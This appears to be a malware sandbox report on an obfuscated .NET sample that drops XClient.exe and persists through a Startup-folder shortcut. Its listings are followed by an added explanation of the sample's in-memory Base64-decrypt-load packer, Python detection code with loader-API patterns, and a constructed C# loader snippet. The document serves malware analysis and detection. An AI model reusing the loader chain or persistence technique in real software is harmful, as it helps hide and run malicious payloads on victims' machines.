                          Source: VJV2AjJ7Na.exe, llVL2VVPJ9sap5xkkujGTYTBVxb.csHigh entropy of concatenated method names: '_8ffFuLAP75dy548usQ1aRiqx5OW', '_4GnA0cF4BV7GlyIj0JtZPfEcSAgnnauVi6iYzLjh1ziSrO62HICqNh5R6cdt', 'qUv0pY6VdW8dZFUPt74rgLPE6bheXtukzl6yiwQu3Fkar1VfCVnuVkEX1E5j', 'ItSLhdEABg05yHgsrQoKr9dwIVhOl8lEtgF8vx1ExkIDtmW0OUrMRcZag3Ry', 'MCbxpVuWUvFHe7sPlmfooMMv66ODY4hXRnJcJzE6QjmTL5nejJu1Hf0sQ6WM', 'ffmwVu1WQulWtwJ8hyhh2oSBl9BoIdVGJdu900hqwe8MsafLyerjcoG5pKjM', 'f72jZflUUmXGdIrjmnMiFzoBB2JCVBioqCw5mbXvMgvAFjJc6sPtyJNpqnIS', 'FwfmNNLpwxrtyDYrczsFNSNyFAvIwyObeOfwtgOw43lrvu6oe7eMtqY4OrBe', '_9IyUqdTWFzVFMAIECUR4YKQVek1Izfq9VAl690Hv4ADB9D6pEPfRZmuOf32i', 'mXoIaeQrZXjGACI0FgKy1iSgdsXZRImXboKoRBFBQHilbysaXiXsf87DkS5G'
                          Source: VJV2AjJ7Na.exe, NGwHDYzHApMBmpHhtkW6w5wNpRc.csHigh entropy of concatenated method names: 'NxkZ125FEx4VSbCg6W1tSpcD66I', 'PfTpXwlolEcNaBr5q3bOdL6uRwt', 'GdRfZNeG1rkSQtfhUx4OPqKbiy0', '_6grvP178v6VX2ZaeBrxBJSscPNJ', 'nSXf6OgfPRFyOahpbGiLFmIqbIc', 'XpyEUgqAAItsoNqKpGb4ouj6zsX', 'tFDfIKNEw9vCpvMAZuiKNMSJ2Sv', 'POryrb6uuBay5N24gr2yY3qRnlz', '_8cVwh2kWqSfjX7O2a8CGPFIQnJm', 'AjcNg5JigSdlbMKtBR9BfMlii1S'
                          Source: VJV2AjJ7Na.exe, Zrb0Vg2QW2gl3HnbQPJCExDoMYJ.csHigh entropy of concatenated method names: '_15VqBWiP8ajSmID7Z1W1s3cUFLn', 'WKYYvblLQN7X5ctNyyp5CURHByT3ig4PR0FwtJdQV1b5crUTObNCR4hBzA2JOEDWYZkiaYnF2EWqG', 'TtRsHFUZB7vkwGLS3ZHafT9462jlra6261CNMNsKKKVuTba0mfCvMzxZ10c8gsDHfbZbwBaVp4AoT', 'RfQymNp614usOTqSD4cUHZt1FAQUYHH4rdE6J2Crk8713oJ6ZwUSNkYWNAb8defLoGfxolpeU2JYH', 'VuRPwX7ivpDyuouYlLqKTsn1g3VNnwoMrbuHQUt6hvyAIdy0Rzp76EI6sEpiS7XacBH3kaulmUlXP'
                          Source: VJV2AjJ7Na.exe, RCjJ5B4jrOCNfAAF4mpf3KELCkk.csHigh entropy of concatenated method names: '_44MZSahGCfIhUdoSyQcFpnYgVsN', 'gO8MF2dyOzaAKN5DISH7MUm6rEr', 'warL5RjU94opEnffdkBYcgq8XGc', 'NEM0emru1GgKovmO25FzKievS1w', '_0F2ciGPIKyVtCd9PESe2HHFnmB7Kb35wSwR2GAsfJbZBc8J4zSK1l9HkzpcB4nTgN4dPq1hSRVqu6', 'aLQu6ILsnDIp2pnZcuXN8l9UkCAUJocrrR15DD6AYKQ3AHCyNprSincLs90P5zfGS5PCVPCYVlE78', '_4zdUiX3cLkOUiiyitascLwgjps4GlTzLhvoQaRJz7HN3iKAMygzqdKuQOsHZ0ZIhrbFGWWAzlVGMQ', 'YOsEoR216joa1YZ6Ak0OOuDeFRiQ2uQjpdZW04cwKlDZuJSfs9RkbgMzIFn4DqynySNVs1ceN2Pn0', 'rJxxwgUMGkUwoY4cqnIx2EqS4HAwVjPfs5Az76ENWcerNH2HVsjPnscyKpiIfDcxGVWRrpVebmivc', 'qYn1GciZGb8rzDAfM2YoAD4yg8IHVxWE2ZSc4Z62RFAp8ESGnPAFN8yqcfVOt2pkRjBqN3EZlJv5K'
                          Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.csHigh entropy of concatenated method names: 'SktjeVQAgq2NUDDhVGQLtffzk7Y', 'CtarBZ1HEXsD94arDPmFsMJ2orj', 'Jcs0stg3beBOtmFfDweOixjz9og', 'R0jFEKXc0magkb27YqxkUPKU4Tl', '_6NXIBwQD7F8nGERUT3TACGB3lOD', 'M8zkVJKItRSoCrcC7cIdzcCNBy9', 'UWTjleB9asvuSQV44RqFkYDJIOj', 'LrphE5fJecFnffhZSGLqABZTJgQ', 'PpsBogNTjabWDCkxX8RGKVEjksp', 'LPmctabsUUhrVXgioj4pZW3enZ9'
                          Source: VJV2AjJ7Na.exe, yg3VA3EFGZdbEMP0sB36o1rvwRb.csHigh entropy of concatenated method names: 'gRdj1vqOUhgpWhn8BStbuJZneww', 'nX35JTmmmDVkBUsZxHNuODxCpf0', 'X43RfMLXrrlVaETBhVNV824YuFp', 'u6L0fr0Yy3pOb1FCBzYomsvDG2X', 'C5RNlXWueLOy7wranJk75UDuXu2', 'KLeSBwFKMdsnmu6yzVHTtNc1dgA', 'YECDjSEvimvIyZ7yaWZIZK0mQnY', 'U4Y4IwVQS1gwVdtQKDGdQIKBlw0', 'YY7p4sCKKtzfVpLfTohfNjEBMM8', 'magkWLfQqTUoel7aG6sciHcBQ51'
                          Source: XClient.exe.0.dr, jKUhhyNoAJUFWqyteGPWRmgpLpp.csHigh entropy of concatenated method names: 'mfVbCuCNZasZDZreMS904bwKapj9Vz2wfKNogpljqsPuv', 'Gg4zNv53TuNwvAQCIqfJWzonXQp4mWWHj7Ie6npEYQChM', 'v4alJqUW46v4wWSnmFm5iw99rbSSbDY2u3NQZ4orbOEph', 'Ll0SRvYpMaesFYYzUHrqKl5Lw3kyY1t04eBy8pByMIqr0'
                          Source: XClient.exe.0.dr, YsN02iaBQuXyZWv7DixuCPmBXWwN2ds2fU0kL0FSjgeViMXx0QEgCCgNVPpd.csHigh entropy of concatenated method names: 'fEqXIn2R713lg1Afq1Ekp3dWoyp0kRM2rKomPnusXouXc3sgyz5XHWRzMztY', 'JlmxmxDnMNmNrfO60n9by9fRLJ2WYBoZwN8GWn8Gpjnci5GzZbD0QY3HLwFv', 'LWiita0dCeFnEUC6wV5bnsT8AiicWr5DglOtCVUwGiqgkexvNVVdervr2w9k', 'ulzyQeELsJZZweTsDIogXVubfi6SdA5SrlKPheIFXDA9oHrJr3YSCHNLOPTQqr', 'nNv4XK3RO20t5nlvvxJ0ogLM4ObUkWtDAHHtsGUCVOUCSD9PJXa3Y7xlSjqerx', 'CQ0Fv18LqIiCwbfcuuC1gbyTOcthOB8Ng5LOTkneXQ5H8qdvGvHeJkIqsnkkf6', 'lOhno887cCEryUJqA9jjJlNa5KylvsVr10YjmerhyWsgV5adrGSYqlRUmGUgIi', 'XhXTCUyuDtworTrGxsbeYmxryjo7ObRbK8wtCbUFH1tZ6r1sTjn0jE4rlU1lMZ', 'ICXsKgKUmIjya0PNKEcNfP9MZeUNMmUFJBVvmR38W4ZaTORR4zmkIs584nhhxS', 'm12R9Fdt9ltHQadKFGw8XVloAljN26OVgjPH90ge7zyk2ICj8roq6sGsdFIXaM'
                          Source: XClient.exe.0.dr, cChbrHmQNgN8mmZ98E8AsEPgqWN.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Ugd2JoN2SW0mzJpuZN82ym08KpWhJdNAWB8BuWpOF4VyM', 'FstFJYjQL0oMfaiRskqfb6PrYdtuWSGdfQ91zQPcTIIM9', 'jL7nI81K42U0X1bOw85qKlMjaDKeP3Fb8Vt5w23JaCMLD', '_7i83NGQwecXMg9NTHQDJAIwsnzXzYC5Kg1R6WtBjYXK5P'
                          Source: XClient.exe.0.dr, wZBvGNYQHp0pdqeFieqC06ydodU.csHigh entropy of concatenated method names: 'tCBmqjcy2cHzHnjZFROdkXE2wyK', 'ZXJ0AecGWeMzAEhmlMZu4lUssqH3NzXwqk8Y4j4lnCptWwnwNlj1czdmFwdEfwBvgo2xfmVCaDjCU', 'bsInprFMhSDLMSX9ivxZ1zg4dQ5gg9zeADq9tGAzNqaO1c6o5fHvE7at9OIQ6W9ExoMIbGx31wwlo', 'wwXPyXW5TeS2Hc2kMBNQXHWntIFvwTrNhXFL1thorQNzORRTZxrUhUbgSUibfhKoJteY6Fsc9KtVI', 'ZcLc4Ki3E7pEYuJOJChVNUnH9n5BeKUIq1vj9hqWIxFCBp8aGAH8RDM8HIcdSYgtl5cXGrCzK1p8p'
                          Source: XClient.exe.0.dr, llVL2VVPJ9sap5xkkujGTYTBVxb.csHigh entropy of concatenated method names: '_8ffFuLAP75dy548usQ1aRiqx5OW', '_4GnA0cF4BV7GlyIj0JtZPfEcSAgnnauVi6iYzLjh1ziSrO62HICqNh5R6cdt', 'qUv0pY6VdW8dZFUPt74rgLPE6bheXtukzl6yiwQu3Fkar1VfCVnuVkEX1E5j', 'ItSLhdEABg05yHgsrQoKr9dwIVhOl8lEtgF8vx1ExkIDtmW0OUrMRcZag3Ry', 'MCbxpVuWUvFHe7sPlmfooMMv66ODY4hXRnJcJzE6QjmTL5nejJu1Hf0sQ6WM', 'ffmwVu1WQulWtwJ8hyhh2oSBl9BoIdVGJdu900hqwe8MsafLyerjcoG5pKjM', 'f72jZflUUmXGdIrjmnMiFzoBB2JCVBioqCw5mbXvMgvAFjJc6sPtyJNpqnIS', 'FwfmNNLpwxrtyDYrczsFNSNyFAvIwyObeOfwtgOw43lrvu6oe7eMtqY4OrBe', '_9IyUqdTWFzVFMAIECUR4YKQVek1Izfq9VAl690Hv4ADB9D6pEPfRZmuOf32i', 'mXoIaeQrZXjGACI0FgKy1iSgdsXZRImXboKoRBFBQHilbysaXiXsf87DkS5G'
                          Source: XClient.exe.0.dr, NGwHDYzHApMBmpHhtkW6w5wNpRc.csHigh entropy of concatenated method names: 'NxkZ125FEx4VSbCg6W1tSpcD66I', 'PfTpXwlolEcNaBr5q3bOdL6uRwt', 'GdRfZNeG1rkSQtfhUx4OPqKbiy0', '_6grvP178v6VX2ZaeBrxBJSscPNJ', 'nSXf6OgfPRFyOahpbGiLFmIqbIc', 'XpyEUgqAAItsoNqKpGb4ouj6zsX', 'tFDfIKNEw9vCpvMAZuiKNMSJ2Sv', 'POryrb6uuBay5N24gr2yY3qRnlz', '_8cVwh2kWqSfjX7O2a8CGPFIQnJm', 'AjcNg5JigSdlbMKtBR9BfMlii1S'
                          Source: XClient.exe.0.dr, Zrb0Vg2QW2gl3HnbQPJCExDoMYJ.csHigh entropy of concatenated method names: '_15VqBWiP8ajSmID7Z1W1s3cUFLn', 'WKYYvblLQN7X5ctNyyp5CURHByT3ig4PR0FwtJdQV1b5crUTObNCR4hBzA2JOEDWYZkiaYnF2EWqG', 'TtRsHFUZB7vkwGLS3ZHafT9462jlra6261CNMNsKKKVuTba0mfCvMzxZ10c8gsDHfbZbwBaVp4AoT', 'RfQymNp614usOTqSD4cUHZt1FAQUYHH4rdE6J2Crk8713oJ6ZwUSNkYWNAb8defLoGfxolpeU2JYH', 'VuRPwX7ivpDyuouYlLqKTsn1g3VNnwoMrbuHQUt6hvyAIdy0Rzp76EI6sEpiS7XacBH3kaulmUlXP'
                          Source: XClient.exe.0.dr, RCjJ5B4jrOCNfAAF4mpf3KELCkk.csHigh entropy of concatenated method names: '_44MZSahGCfIhUdoSyQcFpnYgVsN', 'gO8MF2dyOzaAKN5DISH7MUm6rEr', 'warL5RjU94opEnffdkBYcgq8XGc', 'NEM0emru1GgKovmO25FzKievS1w', '_0F2ciGPIKyVtCd9PESe2HHFnmB7Kb35wSwR2GAsfJbZBc8J4zSK1l9HkzpcB4nTgN4dPq1hSRVqu6', 'aLQu6ILsnDIp2pnZcuXN8l9UkCAUJocrrR15DD6AYKQ3AHCyNprSincLs90P5zfGS5PCVPCYVlE78', '_4zdUiX3cLkOUiiyitascLwgjps4GlTzLhvoQaRJz7HN3iKAMygzqdKuQOsHZ0ZIhrbFGWWAzlVGMQ', 'YOsEoR216joa1YZ6Ak0OOuDeFRiQ2uQjpdZW04cwKlDZuJSfs9RkbgMzIFn4DqynySNVs1ceN2Pn0', 'rJxxwgUMGkUwoY4cqnIx2EqS4HAwVjPfs5Az76ENWcerNH2HVsjPnscyKpiIfDcxGVWRrpVebmivc', 'qYn1GciZGb8rzDAfM2YoAD4yg8IHVxWE2ZSc4Z62RFAp8ESGnPAFN8yqcfVOt2pkRjBqN3EZlJv5K'
                          Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.csHigh entropy of concatenated method names: 'SktjeVQAgq2NUDDhVGQLtffzk7Y', 'CtarBZ1HEXsD94arDPmFsMJ2orj', 'Jcs0stg3beBOtmFfDweOixjz9og', 'R0jFEKXc0magkb27YqxkUPKU4Tl', '_6NXIBwQD7F8nGERUT3TACGB3lOD', 'M8zkVJKItRSoCrcC7cIdzcCNBy9', 'UWTjleB9asvuSQV44RqFkYDJIOj', 'LrphE5fJecFnffhZSGLqABZTJgQ', 'PpsBogNTjabWDCkxX8RGKVEjksp', 'LPmctabsUUhrVXgioj4pZW3enZ9'
                          Source: XClient.exe.0.dr, yg3VA3EFGZdbEMP0sB36o1rvwRb.csHigh entropy of concatenated method names: 'gRdj1vqOUhgpWhn8BStbuJZneww', 'nX35JTmmmDVkBUsZxHNuODxCpf0', 'X43RfMLXrrlVaETBhVNV824YuFp', 'u6L0fr0Yy3pOb1FCBzYomsvDG2X', 'C5RNlXWueLOy7wranJk75UDuXu2', 'KLeSBwFKMdsnmu6yzVHTtNc1dgA', 'YECDjSEvimvIyZ7yaWZIZK0mQnY', 'U4Y4IwVQS1gwVdtQKDGdQIKBlw0', 'YY7p4sCKKtzfVpLfTohfNjEBMM8', 'magkWLfQqTUoel7aG6sciHcBQ51'
                           Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | File created: C:\Users\user\AppData\Roaming\XClient.exe (dropped file)
                           Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                           Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
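The rows in this block describe a two-part packer: a Base64 blob is decoded (Convert.FromBase64String), passed through a decryption routine, loaded straight from memory with AppDomain.Load(byte[]) and entered through a late-bound "Invoke" (NewLateBinding.LateCall is the late-binding helper from Microsoft.VisualBasic.CompilerServices; the .cs file names are simply the decompiler's C# rendering), while the "High entropy of concatenated method names" rows are the member-renaming obfuscator on top. The following is an added Python example, not code from the report or from the sample: it implements one reading of that entropy heuristic (the 4.8 bits/char cut-off is an assumption for this example, not the value the report uses) and a search for the loader APIs over a constructed decompiled-source snippet modelled on the LateCall and AppDomain.Load rows above, with simplified identifiers. The obfuscated method names are copied from the jKUhhyNoAJUFWqyteGPWRmgpLpp.cs row; the benign list is constructed.

```python
import math
import re
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Empirical Shannon entropy of text in bits per character (0.0 for empty input)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def method_name_entropy(names) -> float:
    """The report's heuristic: concatenate one type's method names and measure entropy.

    Renaming obfuscators emit random alphanumerics, which push the value toward
    log2(62) = 5.95 bits; readable identifiers reuse a small alphabet and sit well below.
    """
    return shannon_entropy("".join(names))


# Assumed cut-off for this example; the report does not state the value it uses.
ENTROPY_THRESHOLD = 4.8


def looks_renamed(names, threshold: float = ENTROPY_THRESHOLD) -> bool:
    return method_name_entropy(names) >= threshold


# Method names copied from the jKUhhyNoAJUFWqyteGPWRmgpLpp.cs row of the report.
OBFUSCATED_METHOD_NAMES = [
    "mfVbCuCNZasZDZreMS904bwKapj9Vz2wfKNogpljqsPuv",
    "Gg4zNv53TuNwvAQCIqfJWzonXQp4mWWHj7Ie6npEYQChM",
    "v4alJqUW46v4wWSnmFm5iw99rbSSbDY2u3NQZ4orbOEph",
    "Ll0SRvYpMaesFYYzUHrqKl5Lw3kyY1t04eBy8pByMIqr0",
]
# Ordinary .NET member names for comparison (constructed list).
BENIGN_METHOD_NAMES = ["Equals", "GetHashCode", "GetType", "ToString", "Dispose", "Initialize"]

# The loader APIs the report flags, as they appear in decompiled C#.
LOADER_PATTERNS = {
    "AppDomain.Load": re.compile(r"AppDomain\.(?:CurrentDomain\.)?Load\("),
    "Assembly.Load": re.compile(r"\bAssembly\.Load\("),
    "FromBase64String": re.compile(r"Convert\.FromBase64String\("),
    'LateCall("Invoke")': re.compile(r'NewLateBinding\.LateCall\([^;]*?"Invoke"'),
}


def find_loader_apis(decompiled: str) -> list:
    """Names of LOADER_PATTERNS that occur in a decompiled source blob, sorted."""
    return sorted(name for name, rx in LOADER_PATTERNS.items() if rx.search(decompiled))


# Constructed decompiled-source snippet modelled on the LateCall and AppDomain.Load
# rows of the report (shortened, identifiers simplified); not the sample's real code.
SAMPLE_DECOMPILED = '''
byte[] payload = Decrypt(Convert.FromBase64String(config[3]));
object entry = AppDomain.CurrentDomain.Load(payload).EntryPoint;
NewLateBinding.LateCall(entry, (Type)null, "Invoke", new object[2] { null, new object[2] { config[2], payload } },
    (string[])null, (Type[])null, (bool[])null, true);
'''


if __name__ == "__main__":
    for label, names in (("obfuscated", OBFUSCATED_METHOD_NAMES), ("benign", BENIGN_METHOD_NAMES)):
        print(f"{label}: {method_name_entropy(names):.2f} bits/char, renamed={looks_renamed(names)}")
    print("loader APIs:", find_loader_apis(SAMPLE_DECOMPILED))
```

Run `method_name_entropy` per type over a decompiler's output (ILSpy or dnSpy both give you the member list) rather than over the whole assembly: a class that mixes overrides such as Equals and GetHashCode with renamed members, like cChbrHmQNgN8mmZ98E8AsEPgqWN.cs above, still scores high once the random names dominate the concatenation, and the loader-API search tells you which type to unpack from first.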

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
